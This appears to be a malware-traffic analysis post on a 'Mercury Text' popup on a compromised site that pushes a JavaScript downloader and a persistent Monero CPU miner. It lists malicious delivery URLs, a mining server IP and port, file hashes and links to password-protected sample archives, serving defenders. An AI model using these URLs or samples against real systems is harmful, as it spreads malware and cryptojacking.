2017-11-12 - "MERCURY TEXT" POPUP ON CHROME & FIREFOX PUSHES COINMINER

ASSOCIATED FILES:

• Zip archive of the traffic:  2017-11-12-Mercury-Text-pop-sends-coinminer.pcap.zip   2.6 MB (2,610,547 bytes)

• 2017-11-12-Mercury-Text-pop-sends-coinminer.pcap   (2,835,555 bytes)

• Zip archive of some artifacts:  2017-11-12-Mercury-Text-pop-sends-coinminer-artifacts.zip   4.5 MB (4,486,247 bytes)

• ttf.js   (11,150 bytes)
• winhost.exe   (2,586,112 bytes)

 

NOTES:

• Special thanks to @killamjr for notifying me about this.

 

IMAGES

Shown above:  Mercury Text popop on page from compromised site when using FireFox.

 

Shown above:  When using FireFox, this popup sends the JavaScript (.js) file directly.

 

Shown above:  Mercury Text popop on page from compromised site when using Chrome.

 

Shown above:  When using Chrome, this popup sends the JavaScript (.js) in a zip archive.

 

Shown above:  Script diplaying the Mercury Text popup isn't native to the site, but called from bmooc.net.

 

Shown above:  The bmooc.net URL was generated through a document.write, and this is the only JavaScript I found with a document.write.

 

Shown above:  Traffic from an infection filtered in Wireshark.

 

Shown above:  Post-infection traffic indicates this malware is the Monero (XMR) CPU miner.

 

Shown above:  What ttf.js looks like when extracted from the zip archive.

 

Shown above:  Monero CPU miner downloaded and run by the extracted .js file.

 

Shown above:  Scheduled task making the Monero CPU miner persistent on the infected host.

 

TRAFFIC

ASSOCIATED DOMAINS:

• www.lcmarkets.com.au - GET /   [compromised site]
• 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=f   [returned Javascript for Mercury Text popup]
• 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=j   [returned ttf.js]
• 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=e   [returned Monero CPU miner malware]
• 185.202.103.26 port 5000 - post-infection TCP traffic for Monero CPU miner

 

MALWARE

DOWNLOADED .JS FILE (USING FIREFOX BROWSER):

• SHA256 hash:  33fced63e4209e813861c5abd18236bec68a864362bb3433791bcb38238c3bfc
  File size:  11,150 bytes
  File name  ttf.js

MONERO (XMR) CPU MINER:

• SHA256 hash:  a49ab3e7aa54532a2086ad35a08b253fc330a38803698c33c48912f7438c49a5
  File size:  2,586,112
  File location  C:\Users\[username]\AppData\Roaming\winhost.exe

 

FINAL NOTES

Once again, here are the associated files:

• Zip archive of the traffic:  2017-11-12-Mercury-Text-pop-sends-coinminer.pcap.zip   2.6 MB (2,610,547 bytes)
• Zip archive of some artifacts:  2017-11-12-Mercury-Text-pop-sends-coinminer-artifacts.zip   4.5 MB (4,486,247 bytes)

Zip and saz files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.